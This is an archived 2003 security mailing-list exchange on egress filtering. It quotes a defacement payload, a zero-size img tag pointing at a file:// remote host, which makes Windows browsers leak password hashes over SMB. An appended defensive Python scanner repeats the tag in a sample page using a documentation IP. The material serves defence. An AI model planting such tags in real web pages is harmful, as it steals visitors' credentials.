RE: Importance of outbound traffic filtering

From: Jack Lyons (jack.lyonsat_private)
Date: Tue Jul 22 2003 - 09:38:47 PDT

    I block those ports and others outbound, but it would only stop a DDoS attack
    against people who left those ports open inbound - correct?
    
    > -----Original Message-----
    > From: Stark, Vernon L. [mailto:Vern.Starkat_private]
    > Sent: Friday, July 18, 2003 10:13 AM
    > To: 'incidentsat_private'
    > Subject: Importance of outbound traffic filtering
    > 
    > 	For the third time since May 5th, a site which provides news about
    > Department of Defense issues has apparently been defaced.  The hack is
    > described in Ed Skoudis's excellent book entitled "Counter Hack" (pages
    > 289-290).  The hack we noticed today is a web page with content of the
    > form
    > 
    > <img src=file://korean_ip_address/test.jpg height=0 width=0>
    > 
    > 	If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows
    > hosts will attempt to send password hashes to the remote host.  Hosts may
    > attempt to contact the remote host on other ports (e.g. 80) as well.  This
    > clearly illustrates the importance of outbound traffic filtering.
    > 
    > Vern Stark, GCIA, GSEC
    > 
    > JHU/APL
    > 
    
    
    
    
    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------
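
Added example (not part of the original thread and not either poster's code): a defender-side check to go alongside the egress filter discussed above. It scans served HTML for references of the kind quoted in the message, `file://host/...` or a UNC `\\host\share` path, which cause Windows clients to open outbound SMB connections. The sample page, the attribute list and the address 192.0.2.10 are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes whose value a browser may fetch (assumed list, extend as needed).
URL_ATTRS = {"src", "href", "background", "data", "lowsrc", "dynsrc"}
# file://host/... or \\host\share. file:///C:/... has an empty host and is local.
REMOTE_FILE = re.compile(r"^\s*(?:file://|\\\\)(?P<host>[^/\\\s]+)(?:[/\\]|$)", re.I)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}


class RemoteFileRefFinder(HTMLParser):
    """Collects (line, tag, attribute, host) for remote file/UNC references."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names and accepts unquoted values.
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            m = REMOTE_FILE.match(value)
            if m and m.group("host").lower() not in LOCAL_HOSTS:
                self.findings.append((self.getpos()[0], tag, name, m.group("host")))


def find_remote_file_refs(html):
    parser = RemoteFileRefFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page; 192.0.2.10 is a documentation address (TEST-NET-1).
SAMPLE = """<html><body>
<img src=file://192.0.2.10/test.jpg height=0 width=0>
<img src="file:///C:/local/logo.gif">
<a href="\\\\fileserver.example\\share\\doc.txt">doc</a>
<img src="http://www.example.com/banner.gif">
</body></html>"""

if __name__ == "__main__":
    for line, tag, attr, host in find_remote_file_refs(SAMPLE):
        print(f"line {line}: <{tag} {attr}=...> references remote host {host}")
```

A hit on a page you serve is a sign of defacement; the outbound block on TCP 139 and 445 remains the control that protects clients browsing pages you do not serve.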
    


